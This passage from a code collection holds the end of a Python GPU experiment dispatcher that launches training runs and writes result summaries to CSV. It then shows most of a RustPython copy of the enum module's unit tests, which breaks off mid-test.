def launch_experiment(args, gpu, worker_args, flag_string):
'''
Launch an experiment and direct logs and results to a unique filepath.
Alert of something goes wrong.
:gpu: gpu to run this machine on.
:flag_string: flags to use for this model run. Will be fed into
scripts/main.py
'''
if not os.path.isdir(args.log_dir):
os.makedirs(args.log_dir)
log_name = md5(flag_string)
log_stem = os.path.join(args.log_dir, log_name)
log_path = '{}.txt'.format(log_stem)
results_path = "{}.results".format(log_stem)
experiment_string = "CUDA_VISIBLE_DEVICES={} python -u scripts/main.py {} --results_path {}".format(
gpu, flag_string, results_path)
if 'port' in worker_args:
experiment_string += ' --master_port {}'.format(worker_args['port'])
if 'host' in worker_args:
experiment_string += ' --master_host {}'.format(worker_args['host'])
# forward logs to logfile
if "--resume" in flag_string and not args.rerun:
pipe_str = ">>"
else:
pipe_str = ">"
shell_cmd = "{} {} {} 2>&1".format(experiment_string, pipe_str, log_path)
print("Launched exp: {}".format(shell_cmd))
if not os.path.exists(results_path) or args.rerun:
if not args.dry_run:
subprocess.call(shell_cmd, shell=True)
if not os.path.exists(results_path):
# running this process failed, alert me
job_fail_msg = EXPERIMENT_CRASH_MSG.format(experiment_string, log_path)
print(job_fail_msg)
return results_path, log_path
def worker(args, gpu, worker_args, job_queue, done_queue):
'''
Worker thread for each gpu. Consumes all jobs and pushes results to done_queue.
:gpu - gpu this worker can access.
:job_queue - queue of available jobs.
:done_queue - queue where to push results.
'''
while not job_queue.empty():
params = job_queue.get()
if params is None:
return
done_queue.put(
launch_experiment(args, gpu, worker_args, params))
def get_summary_dict_from_run(result_path, log_path, experiment_axies):
summary_dict = OrderedDict()
try:
result_dict = pickle.load(open(result_path, 'rb'))
except Exception as e:
print("Experiment failed! Logs are located at: {}".format(log_path))
return summary_dict
result_dict['log_path'] = log_path
for k in experiment_axies:
summary_dict[k] = result_dict[k]
splits = []
for key in ['eval_train', 'dev','test']:
if result_dict[key]:
splits.append(key)
for split in splits:
split_path = '{}.{}_.metrics'.format(result_path, split)
stats = pickle.load(open(split_path, 'rb'))
for k,v in stats.items():
if isinstance(v, float) or isinstance(v, int):
summary_dict["{}_{}".format(split, k)] = v
for k in LOG_KEYS:
summary_dict[k] = result_dict[k]
return summary_dict
def collate_all_summmaries(summary_dict, summary_dict_list, experiment_axies, args):
if len(summary_dict_list) == 0:
summary_columns = list(summary_dict.keys())
summary_dict_list = [summary_dict]
return summary_dict_list, summary_columns
## Assume that summary dict list already has all columns merged
prior_result = summary_dict_list[-1]
prior_columns = list(prior_result.keys())
current_columns = list(summary_dict.keys())
summary_columns = copy.deepcopy(experiment_axies)
for split in ['train','dev','test']:
for col_list in [prior_columns, current_columns]:
for key in col_list:
if split in key and not key in summary_columns:
summary_columns.append(key)
summary_columns.extend(LOG_KEYS)
summary_dict_list.append(summary_dict)
for summary in summary_dict_list:
for key in summary_columns:
if not key in summary:
summary[key] = 'NA'
if args.sort_key in summary_dict_list[-1]:
summary_dict_list = sorted(summary_dict_list, key=lambda k: k[args.sort_key])
else:
print("Warning: Sort key {} not seen in result files".format(args.sort_key))
return summary_dict_list, summary_columns
def update_summary_with_results(result_path, log_path, experiment_axies, summary_dict_list, args):
assert result_path is not None
summary_dict = get_summary_dict_from_run(result_path, log_path, experiment_axies)
summary_dict_list, summary_columns = collate_all_summmaries(summary_dict, summary_dict_list, experiment_axies, args)
result_dir = os.path.dirname(args.result_path)
if not os.path.isdir(result_dir):
os.makedirs(result_dir)
# Write summary to csv
with open(args.result_path, 'w') as out_file:
writer = csv.DictWriter(out_file, fieldnames=summary_columns)
writer.writeheader()
for experiment in summary_dict_list:
writer.writerow(experiment)
return summary_dict_list
if __name__ == "__main__":
args = parser.parse_args()
# load configs, perform sanity checks
configs = []
gpus = args.gpus
for i, config_path in enumerate(args.config_path):
if not os.path.exists(config_path):
print(CONFIG_NOT_FOUND_MSG.format("experiment", config_path))
sys.exit(1)
config = json.load(open(config_path, 'r'))
if 'results_path' in config['search_space']:
print(RESULTS_PATH_APPEAR_ERR)
sys.exit(1)
if args.gpus is None:
if i == 0:
gpus = config['available_gpus']
else:
assert config['available_gpus'] == gpus, "Found mismatch in available gpus! {} != {}, Path = {}".format(gpus, config['available_gpus'], config_path)
configs.append(config)
# construct job list
job_list = []
experiment_axies = []
for config in configs:
config_job_list, config_experiment_axies = parsing.parse_dispatcher_config(config)
job_list.extend(config_job_list)
#TODO: extend experiment_axies
if args.shuffle:
random.shuffle(job_list)
job_queue = multiprocessing.Queue()
done_queue = multiprocessing.Queue()
for job in job_list:
job_queue.put(job)
print("Launching Dispatcher with {} jobs!".format(len(job_list)))
print()
for worker_indx, gpu in enumerate(gpus):
print("Start gpu worker {}".format(gpu))
worker_args = {}
multiprocessing.Process(target=worker, args=(args, gpu, worker_args, job_queue, done_queue)).start()
print()
for i in range(len(job_list)):
result_path, log_path = done_queue.get()
dump_result_string = SUCESSFUL_SEARCH_STR.format(args.result_path)
print("({}/{}) \t {}".format(i+1, len(job_list), dump_result_string))
|
test_enum.py | import enum
import inspect
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from datetime import timedelta
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
try:
class StrEnum(str, Enum):
'accepts only string values'
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
except Exception as exc:
Name = exc
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
# see issue40084
class SuperEnum(IntEnum):
def __new__(cls, value, description=""):
obj = int.__new__(cls, value)
obj._value_ = value
obj.description = description
return obj
class SubEnum(SuperEnum):
sample = 5
self.assertTrue({'description'} <= set(dir(SubEnum.sample)))
def test_enum_in_enum_out(self):
Season = self.Season
self.assertIs(Season(Season.WINTER), Season.WINTER)
def test_enum_value(self):
Season = self.Season
self.assertEqual(Season.SPRING.value, 1)
def test_intenum_value(self):
self.assertEqual(IntStooges.CURLY.value, 2)
def test_enum(self):
Season = self.Season
lst = list(Season)
self.assertEqual(len(lst), len(Season))
self.assertEqual(len(Season), 4, Season)
self.assertEqual(
[Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst)
for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1):
e = Season(i)
self.assertEqual(e, getattr(Season, season))
self.assertEqual(e.value, i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, season)
self.assertIn(e, Season)
self.assertIs(type(e), Season)
self.assertIsInstance(e, Season)
self.assertEqual(str(e), 'Season.' + season)
self.assertEqual(
repr(e),
'<Season.{0}: {1}>'.format(season, i),
)
def test_value_name(self):
Season = self.Season
self.assertEqual(Season.SPRING.name, 'SPRING')
self.assertEqual(Season.SPRING.value, 1)
with self.assertRaises(AttributeError):
Season.SPRING.name = 'invierno'
with self.assertRaises(AttributeError):
Season.SPRING.value = 2
def test_changing_member(self):
Season = self.Season
with self.assertRaises(AttributeError):
Season.WINTER = 'really cold'
def test_attribute_deletion(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
def spam(cls):
pass
self.assertTrue(hasattr(Season, 'spam'))
del Season.spam
self.assertFalse(hasattr(Season, 'spam'))
with self.assertRaises(AttributeError):
del Season.SPRING
with self.assertRaises(AttributeError):
del Season.DRY
with self.assertRaises(AttributeError):
del Season.SPRING.name
def test_bool_of_class(self):
class Empty(Enum):
pass
self.assertTrue(bool(Empty))
def test_bool_of_member(self):
class Count(Enum):
zero = 0
one = 1
two = 2
for member in Count:
self.assertTrue(bool(member))
def test_invalid_names(self):
with self.assertRaises(ValueError):
class Wrong(Enum):
mro = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_create_= 11
with self.assertRaises(ValueError):
class Wrong(Enum):
_get_mixins_ = 9
with self.assertRaises(ValueError):
class Wrong(Enum):
_find_new_ = 1
with self.assertRaises(ValueError):
class Wrong(Enum):
_any_name_ = 9
def test_bool(self):
# plain Enum members are always True
class Logic(Enum):
true = True
false = False
self.assertTrue(Logic.true)
self.assertTrue(Logic.false)
# unless overridden
class RealLogic(Enum):
true = True
false = False
def __bool__(self):
return bool(self._value_)
self.assertTrue(RealLogic.true)
self.assertFalse(RealLogic.false)
# mixed Enums depend on mixed-in type
class IntLogic(int, Enum):
true = 1
false = 0
self.assertTrue(IntLogic.true)
self.assertFalse(IntLogic.false)
def test_contains(self):
Season = self.Season
self.assertIn(Season.AUTUMN, Season)
with self.assertRaises(TypeError):
3 in Season
with self.assertRaises(TypeError):
'AUTUMN' in Season
val = Season(3)
self.assertIn(val, Season)
class OtherEnum(Enum):
one = 1; two = 2
self.assertNotIn(OtherEnum.two, Season)
def test_comparisons(self):
Season = self.Season
with self.assertRaises(TypeError):
Season.SPRING < Season.WINTER
with self.assertRaises(TypeError):
Season.SPRING > 4
self.assertNotEqual(Season.SPRING, 1)
class Part(Enum):
SPRING = 1
CLIP = 2
BARREL = 3
self.assertNotEqual(Season.SPRING, Part.SPRING)
with self.assertRaises(TypeError):
Season.SPRING < Part.CLIP
def test_enum_duplicates(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = FALL = 3
WINTER = 4
ANOTHER_SPRING = 1
lst = list(Season)
self.assertEqual(
lst,
[Season.SPRING, Season.SUMMER,
Season.AUTUMN, Season.WINTER,
])
self.assertIs(Season.FALL, Season.AUTUMN)
self.assertEqual(Season.FALL.value, 3)
self.assertEqual(Season.AUTUMN.value, 3)
self.assertIs(Season(3), Season.AUTUMN)
self.assertIs(Season(1), Season.SPRING)
self.assertEqual(Season.FALL.name, 'AUTUMN')
self.assertEqual(
[k for k,v in Season.__members__.items() if v.name != k],
['FALL', 'ANOTHER_SPRING'],
)
def test_duplicate_name(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
red = 4
with self.assertRaises(TypeError):
class Color(Enum):
red = 1
green = 2
blue = 3
def red(self):
return 'red'
with self.assertRaises(TypeError):
class Color(Enum):
@property
def red(self):
return 'redder'
red = 1
green = 2
blue = 3
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_enum_with_value_name(self):
class Huh(Enum):
name = 1
value = 2
self.assertEqual(
list(Huh),
[Huh.name, Huh.value],
)
self.assertIs(type(Huh.name), Huh)
self.assertEqual(Huh.name.name, 'name')
self.assertEqual(Huh.name.value, 1)
def test_format_enum(self):
Season = self.Season
self.assertEqual('{}'.format(Season.SPRING),
'{}'.format(str(Season.SPRING)))
self.assertEqual( '{:}'.format(Season.SPRING),
'{:}'.format(str(Season.SPRING)))
self.assertEqual('{:20}'.format(Season.SPRING),
'{:20}'.format(str(Season.SPRING)))
self.assertEqual('{:^20}'.format(Season.SPRING),
'{:^20}'.format(str(Season.SPRING)))
self.assertEqual('{:>20}'.format(Season.SPRING),
'{:>20}'.format(str(Season.SPRING)))
self.assertEqual('{:<20}'.format(Season.SPRING),
'{:<20}'.format(str(Season.SPRING)))
def test_str_override_enum(self):
class EnumWithStrOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
self.assertEqual(str(EnumWithStrOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!')
def test_format_override_enum(self):
class EnumWithFormatOverride(Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'Format!!'
self.assertEqual(str(EnumWithFormatOverride.one), 'EnumWithFormatOverride.one')
self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!')
def test_str_and_format_override_enum(self):
class EnumWithStrFormatOverrides(Enum):
one = auto()
two = auto()
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!')
def test_str_override_mixin(self):
class MixinEnumWithStrOverride(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Overridden!'
self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!')
self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!')
def test_str_and_format_override_mixin(self):
class MixinWithStrFormatOverrides(float, Enum):
one = 1.0
two = 2.0
def __str__(self):
return 'Str!'
def __format__(self, spec):
return 'Format!'
self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!')
self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!')
def test_format_override_mixin(self):
class TestFloat(float, Enum):
one = 1.0
two = 2.0
def __format__(self, spec):
return 'TestFloat success!'
self.assertEqual(str(TestFloat.one), 'TestFloat.one')
self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!')
def assertFormatIsValue(self, spec, member):
self.assertEqual(spec.format(member), spec.format(member.value))
def test_format_enum_date(self):
Holiday = self.Holiday
self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH)
self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_format_enum_float(self):
Konstants = self.Konstants
self.assertFormatIsValue('{}', Konstants.TAU)
self.assertFormatIsValue('{:}', Konstants.TAU)
self.assertFormatIsValue('{:20}', Konstants.TAU)
self.assertFormatIsValue('{:^20}', Konstants.TAU)
self.assertFormatIsValue('{:>20}', Konstants.TAU)
self.assertFormatIsValue('{:<20}', Konstants.TAU)
self.assertFormatIsValue('{:n}', Konstants.TAU)
self.assertFormatIsValue('{:5.2}', Konstants.TAU)
self.assertFormatIsValue('{:f}', Konstants.TAU)
def test_format_enum_int(self):
Grades = self.Grades
self.assertFormatIsValue('{}', Grades.C)
self.assertFormatIsValue('{:}', Grades.C)
self.assertFormatIsValue('{:20}', Grades.C)
self.assertFormatIsValue('{:^20}', Grades.C)
self.assertFormatIsValue('{:>20}', Grades.C)
self.assertFormatIsValue('{:<20}', Grades.C)
self.assertFormatIsValue('{:+}', Grades.C)
self.assertFormatIsValue('{:08X}', Grades.C)
self.assertFormatIsValue('{:b}', Grades.C)
def test_format_enum_str(self):
Directional = self.Directional
self.assertFormatIsValue('{}', Directional.WEST)
self.assertFormatIsValue('{:}', Directional.WEST)
self.assertFormatIsValue('{:20}', Directional.WEST)
self.assertFormatIsValue('{:^20}', Directional.WEST)
self.assertFormatIsValue('{:>20}', Directional.WEST)
self.assertFormatIsValue('{:<20}', Directional.WEST)
def test_object_str_override(self):
class Colors(Enum):
RED, GREEN, BLUE = 1, 2, 3
def __repr__(self):
return "test.%s" % (self._name_, )
__str__ = object.__str__
self.assertEqual(str(Colors.RED), 'test.RED')
def test_enum_str_override(self):
class MyStrEnum(Enum):
def __str__(self):
return 'MyStr'
class MyMethodEnum(Enum):
def hello(self):
return 'Hello! My name is %s' % self.name
class Test1Enum(MyMethodEnum, int, MyStrEnum):
One = 1
Two = 2
self.assertTrue(Test1Enum._member_type_ is int)
self.assertEqual(str(Test1Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
#
class Test2Enum(MyStrEnum, MyMethodEnum):
One = 1
Two = 2
self.assertEqual(str(Test2Enum.One), 'MyStr')
self.assertEqual(format(Test1Enum.One, ''), 'MyStr')
def test_inherited_data_type(self):
class HexInt(int):
def __repr__(self):
return hex(self)
class MyEnum(HexInt, enum.Enum):
A = 1
B = 2
C = 3
self.assertEqual(repr(MyEnum.A), '<MyEnum.A: 0x1>')
def test_too_many_data_types(self):
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(str, int, Enum):
One = 1
class MyStr(str):
def hello(self):
return 'hello, %s' % self
class MyInt(int):
def repr(self):
return hex(self)
with self.assertRaisesRegex(TypeError, 'too many data types'):
class Huh(MyStr, MyInt, Enum):
One = 1
def test_hash(self):
Season = self.Season
dates = {}
dates[Season.WINTER] = '1225'
dates[Season.SPRING] = '0315'
dates[Season.SUMMER] = '0704'
dates[Season.AUTUMN] = '1031'
self.assertEqual(dates[Season.AUTUMN], '1031')
def test_intenum_from_scratch(self):
class phy(int, Enum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_intenum_inherited(self):
class IntEnum(int, Enum):
pass
class phy(IntEnum):
pi = 3
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_from_scratch(self):
class phy(float, Enum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_floatenum_inherited(self):
class FloatEnum(float, Enum):
pass
class phy(FloatEnum):
pi = 3.1415926
tau = 2 * pi
self.assertTrue(phy.pi < phy.tau)
def test_strenum_from_scratch(self):
class phy(str, Enum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_strenum_inherited(self):
class StrEnum(str, Enum):
pass
class phy(StrEnum):
pi = 'Pi'
tau = 'Tau'
self.assertTrue(phy.pi < phy.tau)
def test_intenum(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertEqual(['a', 'b', 'c'][WeekDay.MONDAY], 'c')
self.assertEqual([i for i in range(WeekDay.TUESDAY)], [0, 1, 2])
lst = list(WeekDay)
self.assertEqual(len(lst), len(WeekDay))
self.assertEqual(len(WeekDay), 7)
target = 'SUNDAY MONDAY TUESDAY WEDNESDAY THURSDAY FRIDAY SATURDAY'
target = target.split()
for i, weekday in enumerate(target, 1):
e = WeekDay(i)
self.assertEqual(e, i)
self.assertEqual(int(e), i)
self.assertEqual(e.name, weekday)
self.assertIn(e, WeekDay)
self.assertEqual(lst.index(e)+1, i)
self.assertTrue(0 < e < 8)
self.assertIs(type(e), WeekDay)
self.assertIsInstance(e, int)
self.assertIsInstance(e, Enum)
def test_intenum_duplicates(self):
class WeekDay(IntEnum):
SUNDAY = 1
MONDAY = 2
TUESDAY = TEUSDAY = 3
WEDNESDAY = 4
THURSDAY = 5
FRIDAY = 6
SATURDAY = 7
self.assertIs(WeekDay.TEUSDAY, WeekDay.TUESDAY)
self.assertEqual(WeekDay(3).name, 'TUESDAY')
self.assertEqual([k for k,v in WeekDay.__members__.items()
if v.name != k], ['TEUSDAY', ])
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_intenum_from_bytes(self):
self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
